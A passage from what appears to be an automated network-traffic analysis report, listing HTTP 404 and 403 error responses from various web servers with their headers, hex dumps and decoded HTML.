57 77 26 66 24 46 12 d7 f8 fe 2d 07 41 e2 42 7f b9 04 d2 2f 86 a1 27 4c 35 fe f5 cd 36 3f c9 3f 97 56 95 4d f2 7c f8 1a 64 ee 25 b8 fc fe 6e cd 25 62 85 59 39 3c 40
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 18:48:14 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 10:57:14 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:56:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingETag: W/"62c6a800-157"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Sun, 23 Oct 2022 15:57:00 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:00 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 16:55:42 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdDate: Mon, 12 Jan 1970 03:11:42 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Sun, 23 Oct 2022 15:57:02 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.18.0</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 23 Oct 2022 15:57:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 18:00:10 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OkServer: micro_httpdCache-Control: no-cacheDate: Sun, 23 Oct 2022 17:57:02 GMTContent-Type: application/octet-streamConnection: closeData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 37 3a 35 37 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 70 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 70 72 6f 78 79 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 70 72 6f 78 79 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sun, 23 Oct 2022 17:57:02 GMTContent-Type: text/htmlConnection: close<html><head><META HTTP-EQUIV="pragma" CONTENT="private, no-cache, no-store, proxy-revalidate, no-transform"><META HTTP-EQUIV="Cache-Control" CONTENT="private, no-cache, no-store, proxy-revalidate, no-transform"><META HTTP-EQUIV="expires" CONTENT="-1"><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 10:57:18 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Wed, 17 Jan 2018 17:38:01 GMTServer: lighttpd/1.4.28Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Sun, 23 Oct 2022 16:57:06 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Jan 2012 09:57:21 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:07 GMTServer: ApacheContent-Length: 1271X-Frame-Options: denyKeep-Alive: timeout=2, max=200Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:57:06 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 